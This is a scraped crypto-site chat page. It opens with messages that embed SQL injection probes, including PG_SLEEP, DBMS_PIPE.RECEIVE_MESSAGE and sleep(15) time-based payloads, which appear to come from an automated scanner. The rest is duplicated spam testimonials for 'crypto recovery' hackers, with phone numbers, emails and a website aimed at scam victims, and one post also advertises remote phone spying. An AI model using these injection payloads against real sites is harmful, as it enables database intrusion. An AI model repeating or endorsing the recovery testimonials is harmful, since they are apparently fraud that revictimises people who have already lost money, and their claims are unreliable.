  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'"

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:28 pHqghUme

    @@olQP6

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891 from DUAL)

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891)

  • 09.10.25 08:30 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:33 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:35 pHqghUme

    e

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:40 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:40 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:41 pHqghUme

    e

  • 09.10.25 08:41 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:42 pHqghUme

    e

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 11.10.25 04:41 luciajessy3

    Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…

  • 11.10.25 10:44 Tonerdomark

    A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 19:53 Tonerdomark

    A crook swiped my Dogecoin. It ruined my whole world. Then Mr. Sylvester showed up. He fixed it all. He pulled back €211,000 for me. Not one cent missing from my profits. His steady cool and sharp tech know-how won back my trust. I got my money smooth and sound. After endless worry, relief hit me hard. I trusted him completely. Lost cash to a scam? Hit him up now at { yt7cracker@gmail . com }. His aid turned my life around. WhatsApp at +1 512 577 7957.

  • 12.10.25 21:36 blessing

    Writing this review is a joy. Marie has provided excellent service ever since I started working with her in early 2018. I was worried I wouldn't be able to get my coins back after they were stolen by hackers. I had no idea where to begin, therefore it was a nightmare for me. However, things became easier for me after my friend sent me to [email protected] and +1 7127594675 on WhatsApp. I'm happy that she was able to retrieve my bitcoin so that I could resume trading.

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 01:15 tyleradams

    Hi. Please be wise, do not make the same mistake I had made in the past, I was a victim of bitcoin scam, I saw a glamorous review showering praises and marketing an investment firm, I reached out to them on what their contracts are, and I invested $28,000, which I was promised to get my first 15% profit in weeks, when it’s time to get my profits, I got to know the company was bogus, they kept asking me to invest more and I ran out of patience then requested to have my money back, they refused to answer nor refund my funds, not until a friend of mine introduced me to the NVIDIA TECH HACKERS, so I reached out and after tabling my complaints, they were swift to action and within 36 hours I got back my funds with the due profit. I couldn’t contain the joy in me. I urge you guys to reach out to NVIDIA TECH HACKERS on their email: [email protected]

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 15.10.25 18:07 crypto

    Cryptocurrency's digital realm presents many opportunities, but it also conceals complex frauds. It is quite painful to lose your cryptocurrency to scam. You can feel harassed and lost as a result. If you have been the victim of a cryptocurrency scam, this guide explains what to do ASAP. Following these procedures will help you avoid further issues or get your money back. Communication with Marie ([email protected] and WhatsApp: +1 7127594675) can make all the difference.

  • 15.10.25 21:52 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 15.10.25 21:52 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 17.10.25 20:17 tyleradams

    As time passes, there are an increasing number of frauds involving Bitcoin and other cryptocurrencies. Although there are many individuals who advertise recovering money online, people should use caution in dealing, especially when money is involved. You can trust NVIDIA TECH HACKERS [[email protected]], I promise. They are the top internet recovery company, and as their names indicate, your money is reclaimed as soon as feasible. My bitcoin was successfully retrieved in large part thanks to NVIDIA TECH HACKERS. Ensure that you get top-notch service; NVIDIA TECH HACKERS provides evidence of its work; and payment is only made when the service has been completed to your satisfaction. Reach them via email: [email protected] on google mail

  • 17.10.25 20:20 lindseyvonn

    Have you gotten yourself involved in a cryptocurrency scam or any scam at all? If yes, know that you are not alone, there are a lot of people in this same situation. I'm a Health Worker and was a victim of a cryptocurrency scam that cost me a lot of money. This happened a few weeks ago, there’s only one solution which is to talk to the right people, if you don’t do this you will end up being really depressed. I was really devastated until went on LinkedIn one evening after my work hours and i saw lots of reviews popped up on my feed about [email protected], I sent an email to the team who came highly recommended - [email protected] I started seeing some hope for myself from the moment I sent them an email. The good part is they made the entire process stress free for me, i literally sat and waited for them to finish and I received what I lost in my wallet

  • 17.10.25 20:22 richardcharles

    I would recommend NVIDIA TECH HACKERS to anyone that needs this service. I decided to get into crypto investment and I ended up getting my crypto lost to an investor late last year. The guy who was supposed to be managing my account turned out to be a scammer all along. I invested 56,000 USD and at first, my reading and profit margins were looking good. I started getting worried when I couldn’t make withdrawals and realized that I’ve been scammed. I came across some of the testimonials that people said about NVIDIA TECH HACKERS and how helpful he has been in recovering their funds. I immediately contacted him in his mail at [email protected] so I can get his assistance. One week into the recovery process the funds were traced and recovered back from the scammer. I can't appreciate him enough for his professionalism.

  • 17.10.25 20:23 stevekalfman

    If you need a hacker for scam crypto recovery or mobile spy access remotely kindly reach out to [email protected] for quick response, I hired this hacker and he did a nice job. before NVIDIA TECH HACKERS, I met with different hacker's online which turns out to be scam, this NVIDIA TECH HACKERS case was different and he is the trusted hacker I can vote and refer.

  • 17.10.25 21:42 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 17.10.25 21:42 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 17.10.25 21:42 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

Для участия в Чате вам необходим бесплатный аккаунт pro-blockchain.com Войти Регистрация
Есть вопросы?
С вами на связи 24/7
Help Icon